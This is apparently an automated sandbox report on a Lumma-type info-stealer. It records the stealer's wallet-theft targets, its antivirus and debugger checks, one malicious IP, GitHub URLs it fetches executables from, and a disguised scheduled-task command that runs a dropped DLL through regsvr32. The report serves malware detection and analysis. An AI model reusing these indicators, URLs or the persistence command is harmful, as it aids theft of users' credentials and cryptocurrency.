Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Windows\System32\regsvr32.exe

Code function: 9_2_00007FFDA33DEFF0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,ReadFileEx,SleepEx,GetLastError,

9_2_00007FFDA33DEFF0

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: regsvr32.exe, 00000009.00000002.3361578425.0000000003239000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: regsvr32.exe, 00000009.00000002.3361578425.0000000003239000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dows Defender\MsMpeng.exe
Source: regsvr32.exe, 0000000F.00000002.2611113584.000000000063B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ollydbg.exe

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: regsvr32.exe, 00000009.00000002.3362190126.00000000037EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000037EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: com.liberty.jaxx
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000037EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000037EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 3C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000037EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000037EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: regsvr32.exe, 00000009.00000002.3362190126.00000000037EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Source: Yara match	File source: 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 796, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	321 Windows Management Instrumentation	1 Windows Service	1 Windows Service	1 Masquerading	OS Credential Dumping	651 Security Software Discovery	Remote Services	11 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Scheduled Task/Job	213 Process Injection	1 Disable or Modify Tools	LSASS Memory	341 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	341 Virtualization/Sandbox Evasion	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Native API	Login Hook	1 DLL Side-Loading	213 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	2 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
8n26gvrXUM.exe	50%	ReversingLabs	Win32.Spyware.Lummastealer
8n26gvrXUM.exe	56%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_isdecmp.dll	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_setup64.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_shfoldr.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	3%	ReversingLabs
C:\Users\user\AppData\Local\is-O7IBF.tmp	3%	ReversingLabs
C:\Users\user\AppData\Local\unins000.exe (copy)	3%	ReversingLabs
C:\Users\user\AppData\Roaming\is-66O79.tmp	43%	ReversingLabs	Win64.Packed.Generic
C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)	43%	ReversingLabs	Win64.Packed.Generic

Name	Source	Malicious	Reputation
http://www.innosetup.com/	8n26gvrXUM.exe, 00000000.00000003.2115407999.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.2115978874.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000002.00000000.2116583250.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 8n26gvrXUM.tmp.0.dr, is-O7IBF.tmp.7.dr, 8n26gvrXUM.tmp.6.dr	false	high
http://nuget.org/NuGet.exe	powershell.exe, 0000000A.00000002.2240229224.0000011CF15FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2365576067.000001471006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2561315614.00000254DB37F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.m	powershell.exe, 0000000A.00000002.2248762507.0000011CF9AEF000.00000004.00000020.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/14436606/23354	regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000A.00000002.2207941559.0000011CE17B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2279590786.0000014700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll	regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/2152978/23354rCannot	regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/11564914/23354;	regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe	regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000A.00000002.2207941559.0000011CE17B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2279590786.0000014700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000010.00000002.2561315614.00000254DB37F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe	regsvr32.exe, 00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 0000000A.00000002.2240229224.0000011CF15FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2365576067.000001471006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2561315614.00000254DB37F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000010.00000002.2561315614.00000254DB37F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000010.00000002.2561315614.00000254DB37F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.rs/getrandom#nodejs-es-module-support	regsvr32.exe, regsvr32.exe, 0000000F.00000002.2611799536.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmp, is-66O79.tmp.7.dr	false	high
https://aka.ms/pscore68	powershell.exe, 0000000A.00000002.2207941559.0000011CE1591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2279590786.0000014700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2407948865.00000254CB311000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.remobjects.com/ps	8n26gvrXUM.exe, 00000000.00000003.2115407999.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.2115978874.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000002.00000000.2116583250.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 8n26gvrXUM.tmp.0.dr, is-O7IBF.tmp.7.dr, 8n26gvrXUM.tmp.6.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	regsvr32.exe, 00000009.00000002.3362190126.000000000371A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2207941559.0000011CE1591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2279590786.0000014700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2407948865.00000254CB311000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.202.34.112	unknown	United States		20473	AS-CHOOPAUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583336
Start date and time:	2025-01-02 13:53:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	8n26gvrXUM.exe renamed because original name is a hash value
Original Sample Name:	c6f9f0ec394a72fb302efbcf74da2ea7.exe
Detection:	MAL
Classification:	mal100.spyw.evad.winEXE@26/26@0/1
EGA Information:	Successful, ratio: 40%
HCA Information:	Successful, ratio: 67% Number of executed functions: 177 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 8n26gvrXUM.tmp, PID 6664 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 6084 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6408 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:54:05	API Interceptor	71x Sleep call for process: powershell.exe modified
07:54:48	API Interceptor	63414x Sleep call for process: regsvr32.exe modified
13:54:16	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskMachineUA{D26AEDB2-54A1-4069-8CFB-595FFA7EE9CA} path: regsvr32 s>/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	Setup.exe.7z	Get hash	malicious	Unknown	Browse	207.246.91.177
	Hilix.x86.elf	Get hash	malicious	Mirai	Browse	45.63.53.202
	Hilix.mips.elf	Get hash	malicious	Mirai	Browse	45.63.53.238
	kJsfHgzi7N.exe	Get hash	malicious	XWorm	Browse	192.248.185.253
	DF2.exe	Get hash	malicious	Unknown	Browse	192.248.182.81
	setup.msi	Get hash	malicious	Unknown	Browse	45.77.249.79
	http://parrottalks.info	Get hash	malicious	Unknown	Browse	149.28.124.84
	botx.mips.elf	Get hash	malicious	Mirai	Browse	149.253.144.7
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse	78.141.232.165
	3OQL58yflv.exe	Get hash	malicious	Metasploit	Browse	202.182.125.24

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_isdecmp.dll	1944b321.msi	Get hash	malicious	Unknown	Browse
	Xzm9fAfKhB.exe	Get hash	malicious	Socks5Systemz	Browse
	L9rm7AX4mp.exe	Get hash	malicious	Socks5Systemz	Browse
	AX3-GUI-45.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Socks5Systemz	Browse
	fe61hqe0Dt.exe	Get hash	malicious	Socks5Systemz	Browse
	file.exe	Get hash	malicious	Socks5Systemz	Browse
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse
	AX3-GUI-45.exe	Get hash	malicious	Unknown	Browse
	qgdf1HLJno.exe	Get hash	malicious	Socks5Systemz	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pvd3v1r.d4p.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12jbwdfy.132.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lc5dk53.yus.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bku3nqu0.iew.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
